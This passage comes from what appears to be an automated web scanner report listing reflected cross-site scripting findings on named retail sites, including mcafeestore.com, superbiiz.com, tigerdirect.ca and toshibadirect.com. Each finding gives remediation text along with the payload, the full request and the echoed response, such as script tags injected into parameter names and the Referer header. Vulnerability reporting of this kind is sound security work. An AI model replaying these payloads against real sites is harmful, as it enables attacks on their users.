Date: Fri, 30 Sep 2011 12:44:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=AUD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&ScRiPt>90a9b8ecfa6=1&SiteID=mfe&StyleID=25690700&StyleVersion=17&a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage"--> ...[SNIP]...
3.432. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fb79--><script>alert(1)</script>fc01acd1c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD?6fb79--><script>alert(1)</script>fc01acd1c27=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197952748186,0)
Content-Length: 24170
Date: Fri, 30 Sep 2011 12:45:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?6fb79--><script>alert(1)</script>fc01acd1c27=1&Action=DisplayESIPage&Currency=NZD&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.433. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3b99a--><script>alert(1)</script>af58d55f6c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.NZD%20?3b99a--><script>alert(1)</script>af58d55f6c7=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=292442027539,0)
Content-Length: 22051
Date: Fri, 30 Sep 2011 12:45:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?3b99a--><script>alert(1)</script>af58d55f6c7=1&Action=DisplayESIPage&Currency=AUD&Currency=NZD+&ESIHC=c4711e3e&Env=BASE&Locale=en_AU&SiteID=mfe&StyleID=25690700&StyleVersion=17&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.434. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_HK [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage/locale.en_HK
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d804f--><script>alert(1)</script>2393c4a14c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.en_HK?d804f--><script>alert(1)</script>2393c4a14c8=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107758469954,0)
Content-Length: 24151
Date: Fri, 30 Sep 2011 12:45:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=HKD&ESIHC=c4711e3e&Env=BASE&Locale=en_HK&SiteID=mfe&StyleID=25690900&StyleVersion=17&ceid=176851100&cename=TopHeader&d804f--><script>alert(1)</script>2393c4a14c8=1&id=HomeOffersPage&script> ...[SNIP]...
3.435. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.fr_FR [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage/locale.fr_FR
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f851--><script>alert(1)</script>699ad509a1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.fr_FR?1f851--><script>alert(1)</script>699ad509a1e=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129233291908,0)
Content-Length: 24323
Date: Fri, 30 Sep 2011 12:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="fr" lang="fr"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?1f851--><script>alert(1)</script>699ad509a1e=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=fr_FR&SiteID=mfe&StyleID=25691000&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.436. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.it_IT [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage/locale.it_IT
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1e9d--><script>alert(1)</script>68ed7624ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.it_IT?a1e9d--><script>alert(1)</script>68ed7624ca6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=202247765601,0)
Content-Length: 26606
Date: Fri, 30 Sep 2011 12:45:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="it" lang="it"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=it_IT&SiteID=mfe&StyleID=25691200&StyleVersion=18&a1e9d--><script>alert(1)</script>68ed7624ca6=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.437. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.nl_NL [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage/locale.nl_NL
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 917e8--><script>alert(1)</script>e342d0f2059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.nl_NL?917e8--><script>alert(1)</script>e342d0f2059=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=124938368333,0)
Content-Length: 24378
Date: Fri, 30 Sep 2011 12:46:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="nl" lang="nl"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?917e8--><script>alert(1)</script>e342d0f2059=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=nl_NL&SiteID=mfe&StyleID=25691300&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.438. http://www.superbiiz.com/detail.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superbiiz.com
Path: /detail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b68"%3balert(1)//b5200695155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54b68";alert(1)//b5200695155 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the name request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f067f"%3balert(1)//6149eba4ed9 was submitted in the name parameter. This input was echoed as f067f";alert(1)//6149eba4ed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.440. http://www.superbiiz.com/shopcart.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superbiiz.com
Path: /shopcart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a92"><script>alert(1)</script>2fa6b99892b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Parts ...[SNIP]... <form name=addCoupon method=post action="/shopcart.php/a7a92"><script>alert(1)</script>2fa6b99892b" > ...[SNIP]...
3.441. http://www.superbiiz.com/testimonial_list.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superbiiz.com
Path: /testimonial_list.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea34'><script>alert(1)</script>4bbda3f12e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Parts ...[SNIP]... <a href='/testimonial_list.php/fea34'><script>alert(1)</script>4bbda3f12e2?&perPage=10&page=2'> ...[SNIP]...
3.442. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.superbiiz.com
Path: /signin.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f46d'><script>alert(1)</script>f64e888d837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signin.php/4f46d'><script>alert(1)</script>f64e888d837 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Computer Pa ...[SNIP]... <form action='https://www.superbiiz.com/signin.php/4f46d'><script>alert(1)</script>f64e888d837' name="BillingShipping" method=post > ...[SNIP]...
3.443. https://www.superbiiz.com/signin.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.superbiiz.com
Path: /signin.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6077b"><script>alert(1)</script>bee7bf45bb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signin.php/6077b"><script>alert(1)</script>bee7bf45bb8 HTTP/1.1
Host: www.superbiiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dade9"%3balert(1)//2de852d3325 was submitted in the EdpNo parameter. This input was echoed as dade9";alert(1)//2de852d3325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5002b"%3balert(1)//7620857deb7 was submitted in the EdpNo parameter. This input was echoed as 5002b";alert(1)//7620857deb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b5db"%20a%3db%200434cd2b109 was submitted in the PG parameter. This input was echoed as 8b5db" a=b 0434cd2b109 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /secure/orderlogin.asp?PG=8b5db"%20a%3db%200434cd2b109 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html> <head> <title>Order Login</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="TigerDirect.com is your complete o ...[SNIP]... <input type="hidden" name="PG" value="8b5db" a=b 0434cd2b109"> ...[SNIP]...
3.447. http://www.toshibadirect.com/td/b2c/accessories.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.toshibadirect.com
Path: /td/b2c/accessories.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc6c'-alert(1)-'9fb649c5026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/accessories.jsp?5fc6c'-alert(1)-'9fb649c5026=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.448. http://www.toshibadirect.com/td/b2c/afin.to [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.toshibadirect.com
Path: /td/b2c/afin.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4191'-alert(1)-'de102c2b329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/afin.to?a4191'-alert(1)-'de102c2b329=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.449. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.toshibadirect.com
Path: /td/b2c/laptops.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b25'-alert(1)-'f930d532d1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/laptops.to?page=segHHO&68b25'-alert(1)-'f930d532d1c=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5166d'-alert(1)-'e8d9a0223a3 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/laptops.to?page=segHHO5166d'-alert(1)-'e8d9a0223a3 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.451. http://www.toshibadirect.com/td/b2c/tv.to [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.toshibadirect.com
Path: /td/b2c/tv.to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b97c9'-alert(1)-'1f957b44ff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /td/b2c/tv.to?b97c9'-alert(1)-'1f957b44ff5=1 HTTP/1.1
Host: www.toshibadirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the div request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0a5'%3balert(1)//043c6cbeb43 was submitted in the div parameter. This input was echoed as da0a5';alert(1)//043c6cbeb43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420&c=1&a=0&div=tmDiv_8f1da0a5'%3balert(1)//043c6cbeb43 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357b1'%3balert(1)//c1123920b23 was submitted in the k parameter. This input was echoed as 357b1';alert(1)//c1123920b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420357b1'%3balert(1)//c1123920b23&c=1&a=0&div=tmDiv_8f1 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the k request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd5b"%3balert(1)//44dcd2c2f6b was submitted in the k parameter. This input was echoed as abd5b";alert(1)//44dcd2c2f6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pres?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b"%3balert(1)//44dcd2c2f6b&c=1&a=0&div=tmDiv_8f1 HTTP/1.1
Host: www.trustmarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.jaybrokers.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var tmIboxPath;function tmLoadIboxLib_860eb09f390446b3448b172af9efb00e(){tmIboxPath="http://www.trustmarker.com/cert?k=f3f85aef1e23cff5709ce8f063b18c787a9f6420abd5b";alert(1)//44dcd2c2f6b&r="+escape(location.href);var tmIboxScript=document.createElement("script");tmIboxScript.setAttribute("src","http://www.trustmarker.com/scripts/ibox.js");tmIboxScript.setAttribute("type","text/javascr ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453a4"><script>alert(1)</script>fbcbb11962f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into an HTML comment. The payload 886f4--><script>alert(1)</script>98026709b0b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 2a067<script>alert(1)</script>fd0070ec4fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
